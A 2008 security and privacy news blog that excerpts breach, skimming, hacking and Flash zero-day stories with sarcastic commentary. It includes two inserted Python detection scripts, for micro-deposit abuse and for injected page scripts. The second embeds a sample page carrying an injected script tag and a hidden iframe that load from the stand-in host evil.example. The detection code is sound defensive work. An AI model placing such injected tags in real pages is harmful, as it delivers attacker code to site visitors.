Saturday, May 31, 2008

It seems to me that taking weeks to determine what data was on your tapes just keeps your name in the news – and not in a good way.

25 Firms With Data On Lost Tape Identified

By JANICE PODSADA | Courant Staff Writer May 31, 2008

The missing Bank of New York Mellon computer tape reported last week contained information about nearly 500,000 Connecticut residents from a large number of companies, said state officials, who identified 25 of the companies on Friday. [25, but not all? Bob]

... Some Connecticut residents, including Bruce Sylvester of Hamden, say they are having trouble obtaining information from New York Mellon as to whether their personal information is included on the missing tape.

"My wife and I have the same account," Sylvester said Friday. "We called up Mellon the same day and got two different answers as to whether our information was on the tape." [One assumes this would be handled by the bank's customer service department – would you expect anything else? Note that this leaves nothing in writing... Bob]

This week, New York Mellon also revealed a second security breach in which a computer data storage tape containing the images of scanned checks and other documents was lost in late April as it was being transported from Philadelphia to Pittsburgh.

"We are only now getting our arms around this much smaller incident," Bank of New York Mellon spokesman Ron Sommer said Friday. "I don't know if it involves Connecticut residents."

The second breach affects 47 institutional clients, company officials said. [If my math students told me 47 was smaller than 25, I'd flunk them. Bob]

You don't have to steal the data. Let someone else steal it, and you can just harvest their work.

Stolen data ending up in Google cache, say researchers

Saturday, May 31 2008 @ 07:37 AM EDT Contributed by: PrivacyNews News Section: Breaches

The Finjan security researchers, who uncovered several unprotected hacker servers containing the sensitive email and Web-based data of thousands of people, demonstrated how easy it is to find the data using Google.

By using a simple string of search terms the researchers were able to find stolen passwords and usernames, Social Security numbers, and even the usernames and passwords of internal databases of companies all stored in Google's public caching server.

Source - Props, Fergie's Tech Blog

Identity theft is simple enough for even dumb criminals, but what happens when you run out of patience?

4 Arrested In ATM Skimming Thefts

POSTED: 12:26 pm MST May 30, 2008 UPDATED: 5:32 pm MST May 30, 2008

SCOTTSDALE, Ariz. -- Four people were arrested this week in connection with a string of thefts from ATMs in Scottsdale hotels.

Police said the four used a device inserted into the card readers of the ATMs to hack into the internal computers of the machines and cause them to dispense large amounts of cash. [New, if true. Bob]

The group stole an estimated $100,000 that way, police said.

Two of the men also stole an ATM [Faster than hacking, but requires actual manual labor – not a geek thing. Bob] from the business center of a Scottsdale Hilton, according to police. Investigators said surveillance cameras caught Onik Darmandzhyan and Michael DeMatteo, both 32, stealing the machine.

“Youse can tell when youse got serious research, 'cause most of da page is footnotes.”

A look into the dark underbelly of data breaches

Friday, May 30 2008 @ 02:38 PM EDT Contributed by: PrivacyNews News Section: Breaches

The process by which large volumes of data are stolen, resold, and ultimately used by criminals to commit fraud, has evolved from the sale of a few pieces of sensitive information, such as credit card numbers and expiration dates, to full blown identity packages containing multiple types of sensitive personal information.

That is but one of the disconcerting details of a Department of Justice-penned report that looks at the rapidly morphing, dark side of stolen personal information set to appear in next month’s issue of the Santa Clara Computer and High Technology Journal.

Source - NetworkWorld

Related - DOJ Report: Data Breaches: What the Underground World of “Carding” Reveals [pdf]

I've mentioned that it is never wise to anger a hacker. It also makes no sense for a security manager (or anyone concerned with security) to ignore a warning.

Comcast Hijackers Say They Warned the Company First

By Kevin Poulsen | May 29, 2008 | 7:44:07 PM

The computer attackers who took down Comcast's homepage and webmail service for more than five hours Thursday say they didn't know what they were getting themselves into.

... Comcast, they said, noticed the administrative transfer and wrested back control, forcing the hackers to repeat the exploit to regain ownership of the domain. Then, they say, they contacted Comcast's original technical contact at his home number to tell him what they'd done.

When the Comcast manager scoffed at their claim and hung up on them, 18-year-old EBK decided to take the more drastic measure of redirecting the site's traffic to servers under their control. (Comcast would neither confirm nor deny the warning phone call.)

Note that Comcast is always making news. Must make the Board of Directors happy...

Comcast is Hiring an Internet Snoop for the Feds

Friday, May 30 2008 @ 02:43 PM EDT Contributed by: PrivacyNews News Section: Businesses & Privacy

Wanna tap e-mail, voice, and Web traffic for the government? Well, here's your chance. Comcast, the country's second-largest Internet provider, is looking for an engineer to handle "reconnaissance" and "analysis" of "subscriber intelligence" for the company's "National Security Operations."

Source - Wired

Sounds impressive, but actually not such a much.

Lawsuit Makes Free Credit Monitoring Available

Saturday, May 31 2008 @ 07:02 AM EDT Contributed by: PrivacyNews News Section: Businesses & Privacy

If you have used a credit card or carried any kind of debt or loan account in the past 21 years it's very likely you can take part in an unprecedented $10-billion dollar lawsuit settlement.

Credit reporting agency TransUnion must pay back Aldin Cubillas and 160 million American consumers for selling their private credit information.

Anyone with credit information held by Transunion can retrieve their credit score which normally costs about $12. And on top of that they can enjoy 6 months of credit monitoring -- a $60 dollar value -- for free.

It's punishment for selling consumer credit information to marketers who then turned around and used that data to sell products and services right back to you.

Source - CBS

BlackBerry should milk this for all the advertising they can get.

RIM In Trouble For Not Violating Privacy

Posted by kdawson on Friday May 30, @12:29PM from the end-to-end-baby dept. Privacy

sufijazz writes

"The US government is not alone in wanting to snoop on everything citizens do over email/phone. The Indian government wants that right too. RIM is stating they have no means to decrypt, no master key, and no back door to allow the government to access email."

The article notes that 114,000 BlackBerries are in use on the Indian subcontinent. The government is concerned about attacks by militants and sees the BlackBerry as a security risk.

[From the article:

Two sources familiar with the issue said RIM held talks with the government on Thursday, and members of the Canadian High Commission in New Delhi were also seen at the telecoms ministry headquarters. [BlackBerry is a Canadian company Bob]

... "The BlackBerry security architecture was also purposefully designed to perform as a global system independent of geography," the company said in a letter.

"The location of data centers and the customer's choice of wireless network are irrelevant factors from a security perspective since end-to-end encryption is utilized."

Passwords are probably the wrong technology to use in systems that operate (no pun intended) on an 'ad hoc' basis.

Password sharing leaves NHS audit trail in tatters

Friday, May 30 2008 @ 02:25 PM EDT Contributed by: PrivacyNews News Section: Non-U.S. News

Investigators have been unable to trace a doctor involved in a medical blunder that ended in a patient's death because staff in a Devon hospital had been sharing computer passwords.

The case shows the incompatibility between the way doctors work in practice and the high security needed to protect large databases of confidential patient information under the £12.7bn National Programme for IT (NPfIT).

Source -

How things work in the big leagues. For my Business Continuity class...

A Look At the Workings of Google's Data Centers

Posted by Soulskill on Saturday May 31, @08:07AM from the we're-gonna-need-a-bigger-boat dept.

Doofus brings us a CNet story about a discussion from Google's Jeff Dean spotlighting some of the inner workings of the search giant's massive data centers. Quoting:

"'Our view is it's better to have twice as much hardware that's not as reliable than half as much that's more reliable,' Dean said. 'You have to provide reliability on a software level. If you're running 10,000 machines, something is going to die every day.' Bringing a new cluster online shows just how fallible hardware is, Dean said. In each cluster's first year, it's typical that 1,000 individual machine failures will occur; thousands of hard drive failures will occur; one power distribution unit will fail, bringing down 500 to 1,000 machines for about 6 hours; 20 racks will fail, each time causing 40 to 80 machines to vanish from the network; 5 racks will "go wonky," with half their network packets missing in action; and the cluster will have to be rewired once, affecting 5 percent of the machines at any given moment over a 2-day span, Dean said. And there's about a 50 percent chance that the cluster will overheat, taking down most of the servers in less than 5 minutes and taking 1 to 2 days to recover."

[From the article:

To operate on Google's scale requires the company to treat each machine as expendable.

Beware the iPhone 2.0

The iPhone patent: Steven P. Jobs, inventor — The US Patent and Trademark Office has revealed a mammoth document that can only be described as The iPhone Patent, a 371-page spectacular that covers Apple's handheld multi-touch UI paradigm in excruciating detail. Steve himself wasn't the least bit shy about taking credit atop an entire column of company A-listers for inventing the iPhone's ...

[From the article:

The application also mentions "modules" for video conferencing, GPS, and other currently non-existent (though widely expected) functionality.

Gartner is a well respected group with contacts in most IT shops across the country. Worth looking at their list.

Gartner Reveals Top 10 Technologies For Next Four Years

Posted by ScuttleMonkey on Friday May 30, @03:30PM from the guessing-game dept. IT Technology

Dr. Jim writes

"The good folks over at the Gartner Group have revealed the top 10 technologies that they believe will change the world over the next four years. The usual suspects including multi-core chips, virtualization, and cloud computing are on the list. Multicore servers and virtualization will mean that firms will need fewer boxes, and apps can be easily moved from box to box (and right out the door to an outsourced data center). Workplace social networks and cloud computing means that the need for a centralized IT department will go away. Firms will no longer need to own/maintain the boxes that they use to run their firm's apps. With no need to touch a box, there will be no need to have the IT staff co-located with the boxes."

I like lists and I'm cheap. This list feeds both of my addictions.

Free Open Source Counterparts of Windows Software

May. 28th, 2008 by Varun Kashyap

... But wait I am not finished yet, keep visiting often and check back because soon we will be replacing the complete Adobe Creative Suite with open source software!

Friday, May 30, 2008

Is nothing sacred?

KY: Stolen traffic records include personal information

Thursday, May 29 2008 @ 04:55 PM EDT Contributed by: PrivacyNews News Section: Breaches

The records of more than 300 traffic cases were stolen this month from the Jefferson County court archives, leading court officials to update their security and warn citizens of potential identify theft.

The traffic cases, all from November 2003, include the names, addresses, dates of birth and possibly the Social Security number of people who received a traffic citation or were involved in a DUI arrest that month, said Jefferson Circuit Court Clerk David Nicholson.

He said court workers did not know the records were missing until police told them yesterday.

Source -

Do you really want to say: “We don't know what we're doing?”

State Street Data Theft Affects More Than 45,000

Thursday, May 29 2008 @ 03:38 PM EDT Contributed by: PrivacyNews News Section: Breaches

Computer equipment containing personal information on more than 45,000 customers and employees of a State Street unit was stolen five months ago, the company said. The personal information included names, addresses and social security numbers.

... The company, a Boston-based provider of financial services to institutional investors, said 5,500 employees and 40,000 customers of Investors Financial Services, which it acquired last year, were affected.

The computer equipment was stolen from a vendor hired by Investors Financial Services to provide legal support services.

... The theft occurred in December. State Street said it was informed of the theft in January and needed the past four months to analyze what and whose information had been stolen. That analysis was completed Wednesday.

Source - CNBC

Related - AP reports that State Street says it will provide those affected with free credit monitoring for two years.

Perhaps we can get a look inside if we follow this one.

Stolen Verizon Wireless customer data part of racketeering and money laundering case

Thursday, May 29 2008 @ 12:05 PM EDT Contributed by: PrivacyNews News Section: Breaches

As a follow-up to a story posted on April 25 concerning the discovery of Verizon Wireless customer data in possession of a former employee, Somerset County Prosecutor Wayne J. Forrest announced earlier today that the Somerset County Grand Jury has returned a 407 Count Indictment charging fifteen defendants in an interstate Racketeering, Money Laundering and Conspiracy case. In a press release, Forrest stated, "The underlying investigation, code-named “Operation Stop Payment”, focused primarily on: identifying the number of defendants involved in this criminal enterprise; identifying any individuals, financial institutions or other business and government entities that were victimized by this criminal enterprise; and stopping the payment on fictitious payroll checks that were manufactured by this criminal enterprise on an almost daily basis."

During the execution of search warrants as part of their investigation, detectives had discovered customer records belonging to 2,700 Verizon Wireless customers. The customer data included personal identification information such as the customer’s name, address, cellular account information, Social Security number and/or Federal Taxpayer Identification Number. Prosecutor Forrest said the grand jury charged Tihee Jabbar Brisbane with multiple counts of second degree computer related criminal activity stemming from the theft of the Verizon Wireless customer account summaries. Brisbane had previously been employed as a telemarketing representative for Verizon Wireless from November 3, 2003, until January 26, 2005 at the Verizon Wireless offices located in Branchburg, Somerset County.

The press release provides more details about the other defendants and allegations as well as a listing of banks and companies that were victimized.

Not sure how this could occur every time one user tried to logon yet be classed as “isolated.”

"Glitch" gives customer access to other Charter accounts

Friday, May 30 2008 @ 06:19 AM EDT Contributed by: PrivacyNews News Section: Breaches

... McDowell was horrified that she had somehow gotten into a stranger's account. She quickly logged off. Besides, she still had her own bill to pay.

... She tried again to log on to her account. This time she arrived at the Charter account of a woman in Slidell, La.

... McDowell logged off and tried again, this time arriving at the Charter account of a woman in Covington, Ga.

... McDowell says she did this 20 times, each time getting the account of a different Charter customer. She couldn't see any connection between the names or addresses, although she did note that many of the accounts listed overdue bills.

... Lamont said the company fixed the "glitch" later in the day.

... Lamont said Charter recently had started a new service activation system. In a few isolated instances, "The customer login information was erroneously 'matched' to the wrong customer account under certain specific circumstances upon login attempt. And I hope you'll understand that that's all we can really say," she said in an e-mail. [“Without convincing you that we are entirely incompetent.” Bob]

Source -

This is an interesting description of a Denial of Service attack. The perpetrators willingly admitted that they caused the attack, and even claimed it was because they wanted to continue using Revision3's servers! Sounds like an open and shut lawsuit to me...

Inside the Attack that Crippled Revision3

on May 29th, 2008 at 07:49 am by Jim Louderback in Polemics

As many of you know, Revision3’s servers were brought down over the Memorial Day weekend by a denial of service attack. It’s an all too common occurrence these days. But this one wasn’t your normal cybercrime – there’s a chilling twist at the end. Here’s what happened, and why we’re even more concerned today, after it’s over, than we were on Saturday when it started.

Tools & Techniques: Might be very useful for my website class, not to mention the security troops...

May 30, 2008 12:01 AM PDT

Firefox add-on shows all the files downloaded by the current page

Posted by Dennis O'Reilly

These days you can't be too careful about what you download. A new Firefox add-on from Florian Queze called View Dependencies takes some of the guesswork out of knowing the content of a Web page, and the source of that content.

After you download the free add-on and restart Firefox, you'll see a Dependencies tab when you click Tools > Page Info to view information about the page that's currently open. The tab lists the files on the page, their URL, and their size.

... You can right-click an entry and choose Open in New Tab or Open in New Window to view just that one file. Other context-menu options let you copy the entry, copy just the URL, or just the host name. [Great for stealing... I mean, reverse engineering, and duplicating without compromising patents or copyrights. Bob]

Registration required – probably worth it.

Akamai Releases State of the Internet Report

Written by Allen Stern - May 29, 2008

Akamai is out today with their first "State of the Internet" report. The report is well worth a read as it covers a variety of topics including: security, connection speeds, geography, network access, and Internet penetration. Some of the interesting stats include:

  • China leads the world in attack traffic including denial of service attacks.

  • Nearly 30% of attacks are to port 135 which is used for remote procedure calls on Microsoft operating systems.

  • In March 2008, more than 10,000 Web pages on hundreds of Web sites were infected by hackers looking to steal passwords used in popular online games.

Some details seem a bit fantastic, but if true, they are tools I want!

May 29, 2008 6:02 PM PDT

Did Chinese officials copy U.S. government laptop data and use it in hack?

Posted by Elinor Mills

The U.S. government is looking into allegations that Chinese officials snagged a laptop left unattended by a top U.S. official there, copied the data and then used it to try to hack into U.S. government computers, according to a report by The Associated Press.

The incident is alleged to have happened during Commerce Secretary Carlos M. Gutierrez's trip to Beijing in December, unidentified sources told the AP. Gutierrez told the wire service he couldn't comment on an ongoing investigation.

Since then, the U.S. Computer Emergency Readiness Team, known as US-CERT, responded to computer network break-ins at least three times, the report says.

"The Pentagon, State Department and Commerce Department all have been victimized by widespread computer intrusions blamed on China since July 2006," with the Commerce Department even having to unplug itself from the Internet, as a result, the article says.

[From the article:

Surreptitious copying is believed to have occurred when a laptop was left unattended during Gutierrez's trip to Beijing for trade talks in December...

... Modern copying equipment can duplicate a laptop's storage drive in just minutes. [Not that I'm aware of... Bob]

... A senior U.S. intelligence official, Joel F. Brenner, recounted a separate story of an American financial executive who traveled to Beijing on business and said he had detected attempts to remotely implant monitoring software on his handheld "personal digital assistant" device - software that could have infected the executive's corporate network when he returned home. The executive "counted five beacons popped into his PDA between the time he got off his plane in Beijing and the time he got to his hotel room," Brenner, chief of the office of the National Counterintelligence Executive under the CIA, said during a speech in December.

Brenner recommended throwaway cellular phones for any business people traveling to China.

"The more serious danger is that your device will be corrupted with malicious software that takes only a second or two to download - and you will not know it - and that can be transferred to your home server when you collect your e-mail," he said.

Never annoy a hacker. Never, never annoy lots of hackers.

Comcast Hacked in BitTorrent Throttling Payback?

Written by enigmax on May 29, 2008

It has become apparent during the last few hours that Comcast, everyone’s favorite ISP (especially in the BitTorrent world) has been hacked. The message on the homepage read: “KRYOGENIKS EBK and DEFIANT RoXed COMCAST.”

Can you “disappear” on the Internet?

How to be unGoogleable

Thursday, May 29 2008 @ 10:20 AM EDT Contributed by: PrivacyNews News Section: Internet & Computers

I recently received an odd plea for help. A former colleague e-mailed me to request that all references to her be expunged from the online news blog I coordinate for a university here in Rome. It was a legitimate request, I concluded, so I went into the old posts and deleted the one in which her name appeared. It was about an upcoming event on campus from more than a year ago and had absolutely no news value to readers today.

She was grateful for my quick response. A few minutes later though she was back in my in-box. This time, the tone was less gracious. She Googled her name and still the reference appeared.

Source - Times Online

Thanks to Brian Honan for this link.

Standards is standards. Someone has to try to establish good (if not best) practices...

CDT Issues Privacy Principles for Digital Watermarking

Friday, May 30 2008 @ 06:11 AM EDT Contributed by: PrivacyNews News Section: Other Privacy News

CDT today released a paper offering a set of principles for addressing potential privacy considerations when deploying digital watermarking technology. This technology embeds information within the content of digital media files in a form that is machine readable but often imperceptible to humans. Digital watermarking has a variety of applications and is increasingly being considered as a tool for deterring copyright infringement. CDT's paper is intended to provide guidance for companies that plan to use the technology to communicate information that is specific to individual consumers.

Source - CDT Press Release

Related - Privacy Principles for Digital Watermarking [PDF]

Thursday, May 29, 2008

Big data theft and more evidence that I am not fluent in English...

In: City BPO accused of data theft

Thursday, May 29 2008 @ 06:20 AM EDT Contributed by: PrivacyNews News Section: Breaches

It could well be one of the biggest data thefts in the country. An Ahmedabad-based BPO owner, Maulik Dave, has been accused of data theft from a Florida-based company and selling them to its rival companies in the US.

Dave stole data worth Rs 1 crore [10,000,000? Bob] from the company. With the help of his accomplice based in the US, Milan Dabhi, he sold the data to competitors of the company in the US.

The nondescript office of Business Bee Solutions along the SG Road, a BPO working in the IT sector, has been closed for three months soon after Florida-based Company Noble Ventures Inc. cancelled their contract with Dave.

He then shifted his operations to his home in Vejalpur. Dave had got a contract for two years for designing and maintenance of the website of Noble Ventures Inc. This company provides customer database of 1.25 crore [12,500,000? Bob] US citizens to various marketing companies in the US and also has a client-base in other international markets.

When his contract got cancelled, Dave tapped into the data bank of Noble Ventures Inc., and stole 85 lakh [8,500,000? Bob] records and sold it to the company's rivals in the US.

Source - The Times of India

How things go wrong?

AU: Privacy Commissioner publishes case notes 1 - 7 for 2008

Thursday, May 29 2008 @ 06:05 AM EDT Contributed by: PrivacyNews News Section: Non-U.S. News

The Privacy Commissioner, Karen Curtis, has today released seven new case notes:

The Privacy Commissioner publishes case notes of finalised complaints that are considered to be of interest to the general public.

Cases chosen involve interpretation of the Privacy Act or associated legislation in new circumstances, illustrate systemic issues or illustrate the application of the law to a particular industry or subject area. The case notes are intended to offer a synopsis only and not to be a comprehensive account.

It is a function of the Commissioner to endeavour to resolve complaints by conciliation where appropriate. As a result, the outcome in any particular case will be affected by a number of factors, including the applicable law, the facts of the matter and the approach to the conciliation process taken by both the complainant and respondent.

Please visit the Complaint Case Notes, Summaries and Determinations page for more details.

Source - Office of the Privacy Commissioner

How do you know that credit card information you stole/bought is any good?

Credit thieves use campaign Web sites to test stolen cards’ validity

Thursday, May 29 2008 @ 06:35 AM EDT Contributed by: PrivacyNews News Section: Breaches

Charles Bridges isn't a supporter of Barack Obama.

So he was surprised to find a $103.90 donation to the Obama For America campaign on his American Express credit card statement last month.

What I found out from talking to folks at the Obama campaign was that there is a growing criminal enterprise in which stolen credit card numbers are used to make online donations to political campaigns and charities.

It's not that crooks are suddenly becoming activists or do-gooders. Instead, they have found that making online donations is an easy way to verify that the stolen credit card numbers they are buying or selling are valid.

Source -

How do you tell a crook from a broker?

Stealing From Banks One Cent at a Time

Posted by CmdrTaco on Wednesday May 28, @11:42AM from the not-like-atm-fees-steal-from-you dept. The Almighty Buck Security

JRHelgeson writes

"In a story strangely reminiscent of Superman 3, a 'hacker' allegedly stole over $50,000 from PayPal, Google Checkout as well as several unnamed online brokerage firms. When opening an online brokering account it is common practice for companies such as E-trade and Schwab to send a tiny payment — ranging from only a few cents to a couple of dollars — to verify that the user has access to the bank account listed. According to the story, the attacker wrote a script that opened thousands of accounts at dozens of these providers. He was arrested not for taking the money, but for using false names in order to get it."
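From the provider's side, the scripted signups in this story leave a footprint in the micro-deposit ledger. The Python below is an added illustration (not code from the article or the Slashdot post) of three checks a payment provider could run over its own ledger; the ledger records, thresholds and mule-account names are constructed assumptions.

```python
"""Detection heuristics for micro-deposit verification abuse (added example)."""
from collections import defaultdict
from dataclasses import dataclass
from datetime import datetime, timedelta


@dataclass(frozen=True)
class MicroDeposit:
    ts: datetime            # when the verification deposit was sent
    user_id: str            # account at the provider (brokerage, PayPal, ...)
    holder_name: str        # name the user signed up with
    dest_account: str       # opaque id of the external bank account receiving the cents
    amount_cents: int
    verified: bool          # whether the user later completed the verification step


def shared_destination_abuse(deposits, max_users_per_dest=2):
    """External bank accounts linked from more provider accounts (or under more
    names) than a legitimate customer plausibly needs. Thousands of scripted
    deposits have to land somewhere, so the destination accounts repeat."""
    by_dest = defaultdict(list)
    for d in deposits:
        by_dest[d.dest_account].append(d)
    flagged = {}
    for dest, group in by_dest.items():
        users = {d.user_id for d in group}
        names = {d.holder_name for d in group}
        if len(users) > max_users_per_dest or len(names) > 1:
            flagged[dest] = {
                "users": len(users),
                "names": len(names),
                "cents_sent": sum(d.amount_cents for d in group),
            }
    return flagged


def signup_velocity_abuse(deposits, window=timedelta(hours=1), max_per_window=50):
    """Peak number of verification deposits issued inside any sliding window,
    and whether it exceeds the threshold. A scripted run of signups produces a
    burst that no human signup flow does."""
    times = sorted(d.ts for d in deposits)
    peak, start = 0, 0
    for end, t in enumerate(times):
        while t - times[start] > window:
            start += 1
        peak = max(peak, end - start + 1)
    return peak, peak > max_per_window


def unverified_outflow_cents(deposits):
    """Cents paid to accounts that never completed verification: the money an
    abuser keeps. Debiting the deposit back once verification is done (or
    never done) makes this amount zero by construction."""
    return sum(d.amount_cents for d in deposits if not d.verified)


def build_sample():
    """Constructed ledger: three legitimate customers plus a scripted run of 120
    signups under fake names funnelling deposits into three mule accounts."""
    base = datetime(2008, 5, 1, 9, 0)
    legit = [
        MicroDeposit(base + timedelta(days=i), f"u{i}", name, f"bank-legit-{i}", 37, True)
        for i, name in enumerate(["Ann Lee", "Raj Patel", "Maria Cruz"])
    ]
    scripted = [
        MicroDeposit(base + timedelta(days=10, seconds=15 * i), f"bot{i}",
                     f"Fake Name {i}", f"bank-mule-{i % 3}", 25 + (i % 50), False)
        for i in range(120)
    ]
    return legit + scripted


if __name__ == "__main__":
    ledger = build_sample()
    print("shared destinations:", shared_destination_abuse(ledger))
    print("velocity:", signup_velocity_abuse(ledger))
    print("unverified outflow (cents):", unverified_outflow_cents(ledger))
```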

Perhaps we should include mandatory encryption language in our laws?

M&S appeals against data protection ruling

Wednesday, May 28 2008 @ 08:27 PM EDT Contributed by: PrivacyNews News Section: Breaches

Marks and Spencer (M&S) is appealing against a ruling by the Information Commissioner’s Office (ICO) that the company breached the Data Protection Act (DPA), Computing has learned.

The case will set a precedent on whether or not companies need to encrypt laptops to comply with the DPA.

In January this year, the ICO issued an enforcement notice to the firm to encrypt its laptop hard drives, following the theft from a sub-contractor in April 2006 of a computer containing details of the pension arrangements of 26,000 M&S staff.

Source - computing

What (you ask) is the opposite of “Security through Obscurity?” No stunning examples in the comments, yet.

What Examples of Security Theater Have You Encountered?

Posted by timothy on Wednesday May 28, @04:47PM from the kip-hawley-please-to-the-white-courtesy-phone dept. Security

swillden writes

"Everyone who pays any attention at all to security, both computer security and 'meatspace' security, has heard the phrase Security Theater. For years I've paid close attention to security setups that I come in contact with, and tried to evaluate their real effectiveness vs their theatrical aspects. In the process I've found many examples of pure theater, but even more cases where the security was really a cover for another motive." swillden would like to know what you've encountered along these lines; read on for the rest of his question below.

swillden continues: "Recently, a neighbor uncovered a good example. He and his wife attended a local semi-pro baseball game where security guards were checking all bags for weapons. Since his wife carries a small pistol in her purse, they were concerned that there would be a problem. They decided to try anyway, and see if her concealed weapon permit satisfied the policy. The guard looked at her gun, said nothing and passed them in, then stopped the man behind them because he had beer and snacks in his bag. Park rules prohibit outside food. It's clear what the 'security' check was really about: improving park food vending revenues.

So, what examples of pure security theater have you noticed? Even more interesting, what examples of security-as-excuse have you seen?"

Wednesday, May 28, 2008

Do you suppose these questions would ever be asked at a stockholders meeting?

Axcess Financial laptop stolen in October, but customers not notified until May

Tuesday, May 27 2008 @ 09:15 AM EDT Contributed by: PrivacyNews News Section: Breaches

With many angry voices demanding to know why Bank of New York Mellon customers were not notified of a security breach months ago, some of the smaller breaches that do not get disclosed promptly often get overlooked. One such case involved a laptop stolen from Axcess Financial, Inc. On May 13, Axcess Financial, Inc. notified the New Hampshire Attorney General's office that a laptop stolen from an employee on October 23, 2007 contained personal information including names, addresses, and Social Security numbers of 142 residents of NH who were customers of the company. No explanation was provided to either the AG's office or customers as to why notification to customers was delayed for over 6 months other than that "an extensive forensic investigation was required to determine the information contained within the stolen property." In its notification and disclosure letters, Axcess Financial indicated that misuse of the data was unlikely because of the laptop's "password protection and other security measures." Customers were offered free credit monitoring for 12 months.

When asked for more details about the incident and delayed notification, Jeff Kursman, Director of Public Relations for Axcess Financial, informed that the laptop had been stolen from an employee's vehicle and that the employee was following policy at the time. Kursman did not reply directly to the question of whether the data were encrypted, saying only that "The laptop was secured with password protection."

Did it really take Axcess Financial six months to determine what information was on that laptop? Kursman explains, "The incident was initially classified by law enforcement as a petty crime involving an employee's stolen personal belongings. When it was ascertained that the theft included the loss of a secured computer, additional forensic analysis was conducted. Axcess Financial was supporting an active investigation of law enforcement to recover the property and identify and prosecute the thief(s)." A follow-up inquiry to Kursman asking whether law enforcement specifically requested that Axcess Financial delay notification or if Axcess Financial delayed it on its own initiative was not answered by the time of publication.

Expect more of this at gas stations. After all, if you have enough money to buy gas, your identity is worth stealing!

San Jose police investigating another string of ID thefts at an Arco gas station

Wednesday, May 28 2008 @ 06:51 AM EDT Contributed by: PrivacyNews News Section: Breaches

More than a dozen Silicon Valley consumers have been victimized by thieves who allegedly stole their bank card information and personal identification numbers at a South San Jose gas station.

San Jose police were notified of a theft Monday night when a San Jose couple reported three unauthorized withdrawals totaling $1,500 from their bank account over Memorial Day weekend. By late afternoon, police had reports of at least seven confirmed victims who lost a combined $4,200. They all were customers recently at the same Arco station in the Almaden Valley.

Source - Mercury News Related - NBC11

“Hope is not a strategy” Title of a book I once read (I can too read!)

Business owners have false hopes when it comes to data loss

Wednesday, May 28 2008 @ 06:54 AM EDT Contributed by: PrivacyNews News Section: Breaches

A recent study of fifteen hundred business owners shows that most have an “air of invincibility” when it comes to the potential for their company to suffer an intentional or accidental data exposure. This could explain why we have seen record numbers of information stolen, lost, or leaked over the past year or so.

It is understandable that some companies feel they are secure. However, when the topic of data breaches ranked last among the biggest business fears behind government fines, lawsuits, bankruptcy, and natural disasters, there is something wrong. Forty-five percent of those interviewed admit they are more concerned about data breaches than in the past; however, that figure pales in comparison to the fact that thirty percent are more concerned that they could personally become a victim of identity theft (76% vs. 45%).

Source - The Tech Herald

What will happen when the number of reports exceeds the number of soccer games?

UK: Companies told to disclose data breaches

Wednesday, May 28 2008 @ 06:45 AM EDT Contributed by: PrivacyNews News Section: Breaches

The EU's online security body is calling for laws to force companies to reveal when their computer systems have been breached.

The European Network and Information Security Agency (Enisa) wants mandatory reporting on security and data breaches by businesses.

Enisa called for the change in its General Report 2007, where it also detailed the spread of Computer Emergency Response Teams (Certs) to 14 EU states, up from eight in 2005.

Source - ZDNet (UK)

Related - ENISA: General Report 2007: Full Report (Adopted but financial/accounting figures are provisional. Final, designed version scheduled for July 2008.) [pdf]

Probably the same ratio in the US...

UK: Identity fraud cases up by two thirds

Tuesday, May 27 2008 @ 05:31 PM EDT Contributed by: PrivacyNews News Section: Breaches

Cases of identity fraud increased by two thirds last year with people in affluent areas most at risk, credit data figures show.

London was Britain's identity fraud capital with people almost twice as likely to become victims as those in the rest of the country.

Kensington was the most vulnerable area with residents facing a risk more than three-and-a-half times the average.

It was followed in the top five by Richmond-upon-Thames, Putney, Wimbledon and the King's Road area of Chelsea. Commuter towns, including Guildford, St Albans and Windsor, also faced a risk that was twice the national average.

Source - Telegraph

...and a lot of people use Adobe Flash...

Adobe Flash Zero-Day Attack Underway

Posted by kdawson on Wednesday May 28, @03:26AM from the gone-in-a-flash dept. Security

Robellus writes

"Security researchers have found evidence of a previously unknown Adobe Flash vulnerability being exploited in the wild. The zero-day flaw has been added to the Chinese version of the MPack exploit kit and there are signs that the exploits are being injected into third-party sites to redirect targets to malware-laden servers. From the article: 'Continued investigation reveals this issue is fairly widespread. Malicious code is being injected into other third-party domains (approximately 20,000 web pages) most likely through SQL-injection attacks. The code then redirects users to sites hosting malicious Flash files exploiting this issue.'"
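If your own site might be one of those 20,000 injected pages, the quickest check is to look at the rendered HTML for script, iframe or embed references that point somewhere you do not control. The following is an added example (Python, mine, not code from the Slashdot post or from the report it quotes); the sample page it scans and the trusted_hosts list are constructed for the demonstration.

```python
"""Find script/iframe/embed/object references that load from hosts you do not own.

Added example, not from the Slashdot post. Run it over the HTML your site
actually serves (not the templates): a payload injected into a database
column via SQL injection only shows up in the rendered output.
"""
from html.parser import HTMLParser
from urllib.parse import urlparse


class ExternalRefFinder(HTMLParser):
    """Collect (tag, url) for every element that pulls in remote content."""

    # Attribute that carries the remote reference for each tag of interest.
    REF_ATTRS = {"script": "src", "iframe": "src", "embed": "src", "object": "data"}

    def __init__(self):
        super().__init__()
        self.refs = []

    def handle_starttag(self, tag, attrs):
        attr = self.REF_ATTRS.get(tag.lower())
        if attr is None:
            return
        for name, value in attrs:
            if name.lower() == attr and value:
                self.refs.append((tag.lower(), value.strip()))


def find_injected_references(html, trusted_hosts):
    """Return [(tag, url)] for references whose host is not in trusted_hosts.

    Absolute (http://host/...) and protocol-relative (//host/...) URLs are
    checked; path-only references are same-origin and treated as legitimate.
    """
    trusted = {h.lower() for h in trusted_hosts}
    finder = ExternalRefFinder()
    finder.feed(html)
    suspicious = []
    for tag, url in finder.refs:
        host = urlparse(url).hostname  # None for relative paths
        if host is not None and host.lower() not in trusted:
            suspicious.append((tag, url))
    return suspicious


# Constructed sample page: two legitimate references, then the kind of
# unquoted <script src=...> and hidden <iframe> the mass-injection attacks left behind.
SAMPLE_PAGE = """<html><head>
<script src="/js/site.js"></script>
<script src="http://cdn.example.com/lib.js"></script>
</head><body>
<p>Product description pulled from the database</p><script src=http://evil.example/flash/x.js></script>
<iframe src="//evil.example/swf.html" width=0 height=0></iframe>
</body></html>"""

# Hosts this (hypothetical) site legitimately loads content from.
TRUSTED_HOSTS = ["www.example.com", "cdn.example.com"]

if __name__ == "__main__":
    for tag, url in find_injected_references(SAMPLE_PAGE, TRUSTED_HOSTS):
        print(f"suspicious <{tag}> reference: {url}")
```

The check only catches references to other hosts; an injected inline script that builds the redirect with document.write or unescape needs a separate rule, and the real fix is parameterised queries on the input that let the rows be modified in the first place.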

Another Chinese innovation? (Isn't this likely to slow entrance to the stadium while ticket holders are matched to their photograph and the 'approved' list?)

